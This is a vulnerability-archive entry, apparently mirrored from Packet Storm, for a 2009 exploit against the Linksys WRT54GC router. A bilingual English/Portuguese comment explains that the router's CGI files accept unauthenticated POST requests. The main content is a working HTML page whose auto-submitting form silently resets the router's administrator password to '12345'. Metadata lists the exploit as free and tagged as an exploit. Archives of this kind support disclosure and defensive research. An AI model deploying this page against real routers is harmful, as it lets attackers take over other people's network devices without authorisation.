ID

VAR-E-200904-0719


TITLE

Linksys WRT54GC Password Changer

Trust: 0.5

sources: PACKETSTORM: 76814

DESCRIPTION

Linksys WRT54GC administration password changing exploit.

Trust: 0.5

sources: PACKETSTORM: 76814

AFFECTED PRODUCTS

vendor:linksysmodel:wrt54gcscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 76814

EXPLOIT

<!--
***************
* Gabriel Lima - gabriel@falandodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration

(Portugu\xeas:)
Linksys WRT54GC - Mudan\xe7a de Senha
O roteador WRT54GC parece n\xe3o verificar a autentica\xe7\xe3o do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudan\xe7a de senha. Abaixo, um exemplo de formul\xe1rio que muda a senha e o login de administrador para 12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administra\xe7\xe3o Local e remota.

Credits:
Gabriel Lima. gabriel@falandodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- C\xf3digo de envio autom\xe1tico do formul\xe1rio -->

<SCRIPT language="JavaScript">
document.senha.submit();
</SCRIPT>

</body></html>

Trust: 0.5

sources: PACKETSTORM: 76814

EXPLOIT HASH

LOCAL

SOURCE

md5: 5ab7acb79e1ecafd25b759bf0cf340f7
sha-1: de252782a30d9fad8cbbc92986f5d5671826ac14
sha-256: da074ee787a2a88af7e64dc05e241325daf3525e32fa2814ce3f2e5dd7e34aac
md5: 5ab7acb79e1ecafd25b759bf0cf340f7

Trust: 0.5

sources: PACKETSTORM: 76814

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 76814

TAGS

tag:exploit

Trust: 0.5

sources: PACKETSTORM: 76814

CREDITS

Gabriel Lima

Trust: 0.5

sources: PACKETSTORM: 76814

EXTERNAL IDS

db:PACKETSTORMid:76814

Trust: 0.5

sources: PACKETSTORM: 76814

SOURCES

db:PACKETSTORMid:76814

LAST UPDATE DATE

2022-07-27T09:41:13.112000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:76814date:2009-04-20T19:36:30